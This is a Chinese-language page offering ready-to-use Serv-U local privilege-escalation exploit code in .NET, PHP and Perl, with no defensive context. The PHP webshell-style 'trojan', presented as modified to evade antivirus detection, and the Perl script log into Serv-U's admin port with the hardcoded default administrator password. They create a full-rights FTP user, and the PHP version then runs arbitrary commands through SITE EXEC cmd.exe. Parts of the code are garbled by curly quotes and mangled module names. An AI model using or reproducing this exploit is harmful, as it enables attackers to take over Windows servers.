C.net/Perl/PHP 三个版本的 ServU提权源码程序(精选1篇)
篇1:C.net/Perl/PHP 三个版本的 ServU提权源码程序
1..NET版本Serv-U提权程序
<%@ Page Language=“VB” Debug=“true” %>
<%@ import Namespace=“System.Net.Sockets” %>
from Serv-U 2
admin by lake2
Name
LocalAdministrator
PWD
#l@$ak#.lk;0@P
Port
43958
cmd
2.PHP版sevru提权木马
/**
注释免杀版本
**/
//
//Codez begin
//
//判断magic_quotes_gpc的值
if (get_magic_quotes_gpc) {
$_GET = stripslashes_array($_GET);
}
//变量初始化
$addr = ’0.0.0.0’;
$ftpport = 21;
$adminport = 43958;
$adminuser = ’LocalAdministrator’;
$adminpass = ’#l@$ak#.lk;0@P’;
$user = ’wofeiwo’;
$password = ’wrsky’;
$homedir = ’C:’;
$dir = ’C:WINNTSystem32’;
//有改变则赋值
if ($_GET){
$addr = $_GET[’addr’] ;
$ftpport = $_GET[’ftpport’] ;
$adminport = $_GET[’adminport’] ;
$adminuser = $_GET[’adminuser’] ;
$adminpass = $_GET[’adminpass’] ;
$user = $_GET[’user’] ;
$password = $_GET[’password’] ;
$homedir = $_GET[’homedir’] ;
if ($_GET[’dir’]){
$dir = $_GET[’dir’] ;
}
}
?>
-==-
Serv-U All Version本地提升权限Exp10it Ver 1.5
添加Serv-U用户部分
主机IP:
主机Ftp端口:
主机Ftp管理端口:
主机Ftp管理用户:
主机Ftp管理密码:
添加的用户名:
添加的用户名密码:
用户主目录(别忘了写“”):
命令回显:
//添加用户
if ($_GET[’action’]==“up”){
up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir);
}
?>
执行命令部分
主机Ftp端口:
用户名:
用户名密码:
系统路径(别忘了写“”):
执行的命令:
命令回显:
//执行命令
if ($_GET[’action’]==“execute”){
ftpcmd($ftpport,$user,$password,$dir,$_GET[’cmd’]);
}
?>
Copycenter (C) 我非我 All centers Reserved.
//添加用户主函数定义
function up($addr,$ftpport,$adminport,$adminuser,$adminpass,$user,$password,$homedir){
$fp = fsockopen (“127.0.0.1”, $adminport, $errno, $errstr, 8);
if (!$fp) {
echo “$errstr ($errno)
”;
} else {
fputs ($fp, “USER ”.$adminuser.“ ”);
sleep (1);
fputs ($fp, “PASS ”.$adminpass.“ ”);
sleep (1);
fputs ($fp, “SITE MAINTENANCE ”);
sleep (1);
fputs ($fp, “-SETUSERSETUP ”);
fputs ($fp, “-IP=”.$addr.“ ”);
fputs ($fp, “-PortNo=”.$ftpport.“ ”);
fputs ($fp, “-User=”.$user.“ ”);
fputs ($fp, “-Password=”.$password.“ ”);
fputs ($fp, “-HomeDir=”.$homedir.“ ”);
fputs ($fp, “-LoginMesFile= ”);
fputs ($fp, “-Disable=0 ”);
fputs ($fp, “-RelPaths=0 ”);
fputs ($fp, “-NeedSecure=0 ”);
fputs ($fp, “-HideHidden=0 ”);
fputs ($fp, “-AlwaysAllowLogin=0 ”);
fputs ($fp, “-ChangePassword=1 ”);
fputs ($fp, “-QuotaEnable=0 ”);
fputs ($fp, “-MaxUsersLoginPerIP=-1 ”);
fputs ($fp, “-SpeedLimitUp=-1 ”);
fputs ($fp, “-SpeedLimitDown=-1 ”);
fputs ($fp, “-MaxNrUsers=-1 ”);
fputs ($fp, “-IdleTimeOut=600 ”);
fputs ($fp, “-SessionTimeOut=-1 ”);
fputs ($fp, “-Expire=0 ”);
fputs ($fp, “-RatioUp=1 ”);
fputs ($fp, “-RatioDown=1 ”);
fputs ($fp, “-RatiosCredit=0 ”);
fputs ($fp, “-QuotaCurrent=0 ”);
fputs ($fp, “-QuotaMaximum=0 ”);
fputs ($fp, “-Maintenance=System ”);
fputs ($fp, “-PasswordType=Regular ”);
fputs ($fp, “-Ratios=None ”);
fputs ($fp, “ Access=”.$homedir.“|RWAMELCDP ”);
fputs ($fp, “QUIT ”);
sleep (1);
while (!feof($fp)) {
echo fgets ($fp,128);
}
}
}
//执行命令主函数定义
function ftpcmd($ftpport,$user,$password,$dir,$cmd){
$conn_id = fsockopen (“127.0.0.1”, $ftpport, $errno, $errstr, 8);
if (!$conn_id) {
echo “$errstr ($errno)
”;
} else {
fputs ($conn_id, “USER ”.$user.“ ”);
sleep (1);
fputs ($conn_id, “PASS ”.$password.“ ”);
sleep (1);
fputs ($conn_id, “SITE EXEC ”.$dir.“cmd.exe /c ”.$cmd.“ ”);
fputs ($conn_id, “QUIT ”);
sleep (1);
while (!feof($conn_id)) {
echo fgets ($conn_id,128);
}
fclose($conn_id);
}
}
//去除转义字符
function stripslashes_array(&$array) {
while (list($key,$var) = each($array)) {
if ($key != ’argc’ && $key != ’argv’ && (strtoupper($key) != $key || ’’.intval($key) == “$key”)) {
if (is_string($var)) {
$array[$key] = stripslashes($var);
}
if (is_array($var)) {
$array[$key] = stripslashes_array($var);
}
}
}
return $array;
}
?>
3.Perl版本的serv-U提权程序
#!/usr/bin/perl
use I:Socket;
binmode(STDOUT);
syswrite(STDOUT, “Content-type: text/html ”, 27);
$addr = “127.0.0.1”;
$ftpport = 21;
$adminport = 43958;
$adminuser = “LocalAdministrator”;
$adminpass = ’#l@$ak#.lk;0@P’;
$user = “Andyower”;
$password = “haika”;
$homedir = ’C:’;
$dir = ’C:WINNTSystem32’;
use I:Socket::INET;
$sock = I:Socket::INET->new(“127.0.0.1:$adminport”) || die “fail”;
print “Andyower制作
”;
print $sock “USER $adminuser ”;
sleep (1);
print $sock “PASS $adminpass ”;
sleep(1);
print $sock “SITE MAINTENANCE ”;
sleep(1);
print $sock “-SETUSERSETUP ”;
print $sock “-IP=”.$addr.“ ”;
print $sock “-PortNo=”.$ftpport.“ ”;
print $sock “-User=”.$user.“ ”;
print $sock “-Password=”.$password.“ ”;
print $sock “-HomeDir=”.$homedir.“ ”;
print $sock “-LoginMesFile= ”;
print $sock “-Disable=0 ”;
print $sock “-RelPaths=0 ”;
print $sock “-NeedSecure=0 ”;
print $sock “-HideHidden=0 ”;
print $sock “-AlwaysAllowLogin=0 ”;
print $sock “-ChangePassword=1 ”;
print $sock “-QuotaEnable=0 ”;
print $sock “-MaxUsersLoginPerIP=-1 ”;
print $sock “-SpeedLimitUp=-1 ”;
print $sock “-SpeedLimitDown=-1 ”;
print $sock “-MaxNrUsers=-1 ”;
print $sock “-IdleTimeOut=600 ”;
print $sock “-SessionTimeOut=-1 ”;
print $sock “-Expire=0 ”;
print $sock “-RatioUp=1 ”;
print $sock “-RatioDown=1 ”;
print $sock “-RatiosCredit=0 ”;
print $sock “-QuotaCurrent=0 ”;
print $sock “-QuotaMaximum=0 ”;
print $sock “-Maintenance=System ”;
print $sock “-PasswordType=Regular ”;
print $sock “-Ratios=None ”;
print $sock “ Access=”.$homedir.“|RWAMELCDP ”;
print $sock “QUIT ”;
@ret=<$sock>;
print “@ret”;
close(STDERR);
close(STDOUT);
exit;